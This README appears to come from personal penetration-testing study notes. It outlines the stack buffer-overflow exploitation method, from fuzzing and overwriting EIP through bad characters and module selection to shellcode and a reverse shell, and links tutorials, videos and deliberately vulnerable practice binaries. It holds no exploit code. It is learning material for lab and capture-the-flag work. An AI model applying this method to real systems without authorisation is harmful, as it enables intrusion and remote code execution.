README.md

description	cover	coverY
A Buffer Overflow (BOF) occurs when the amount of data in the buffer exceeds its storage capacity. Once this happens, the extra data overflows into other memory location and RCE can occur.	https://www.imperva.com/learn/wp-content/uploads/sites/13/2018/01/buffer-overflow.png	0

🚰 Buffer Overflow

Corelan Team BOF Introduction

• Part 1: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
• Part 2: https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

Visual Depiction

The stack is overflowed and is replaced with malicious shellcode.

MY Walkthrough

{% content-ref url="overflow1.md" %} overflow1.md {% endcontent-ref %}

{% content-ref url="overflow2.md" %} overflow2.md {% endcontent-ref %}

{% content-ref url="overflow3.md" %} overflow3.md {% endcontent-ref %}

Attacking the Stack part of memory

• We need to overflow buffer space → write over buffer space down to EIP → Control the stack → spawn reverse shell
• Remember, the buffer overflow methodology consists of several steps:
  1. Spiking
     1. Method to find the vulnerable part of the program.
  2. Fuzzing
     1. Sending a bunch of characters/messages to a program to break it.
  3. Finding the offset
     1. At what point did we break it? This is called the offset.
  4. Overwriting the EIP
     1. The offset will then be utilized to overwrite the EIP.
  5. Finding bad characters
     1. We need to find out which characters are compatible with the shellcode and which characters are not.
  6. Finding the correct module
     1. Looking for a DLL or something similar within a program that does not contain memory protections.
     2. Mona Modules + Immunity Debugger
  7. Generate shellcode that leads to RCE

Buffer Overflow Methodology Example

Step-By-Step Example

Spiking:

https://www.youtube.com/watch?v=3x2KT4cRP9o&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=2

Fuzzing:

https://www.youtube.com/watch?v=FCIfWTAtPr0&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=3

Finding the Offset:

https://www.youtube.com/watch?v=GqwyonqLYdQ&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=4

Overwriting the EIP:

https://www.youtube.com/watch?v=Wh9wRKBzajo&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=5

Finding Bad Characters:

https://www.youtube.com/watch?v=uIFYNVqpZ0k&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=6

Finding the Right Module:

https://www.youtube.com/watch?v=k9D9RuFT02I&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=7

Generating Shellcode and Gaining RCE:

https://www.youtube.com/watch?v=qSjxR8tfokg&list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&index=8

Additional Resources for Buffer Overflows:

TryHackMe | Buffer Overflow Prep

TryHackMe | Brainpan 1

Windows Binaries

The following binaries are vulnerable to BOFs:

• Vulnserver: https://samsclass.info/127/proj/vuln-server.htm
• Minishare 1.4.1: https://www.exploit-db.com/exploits/636
• Savant Web Server 3.1: https://www.exploit-db.com/exploits/10434
• Freefloat FTP Server 1.0: https://www.exploit-db.com/exploits/40673
• Core FTP Server 1.2: https://www.exploit-db.com/exploits/39480
• WarFTP 1.65: https://www.exploit-db.com/exploits/3570
• VUPlayer 2.4.9: https://www.exploit-db.com/exploits/40018

Linux Binaries

The following binaries are vulnerable to BOFs:

• Brainpan 1: https://www.vulnhub.com/entry/brainpan-1,51/
• Pinky’s Palace version 1: https://www.vulnhub.com/entry/pinkys-palace-v1,225/
• Stack Overflows for Beginners: https://www.vulnhub.com/entry/stack-overflows-for-beginners-101,290/
• SmashTheTux: https://www.vulnhub.com/entry/smashthetux-101,138/
• Pandora’s Box: https://www.vulnhub.com/entry/pandoras-box-1,111/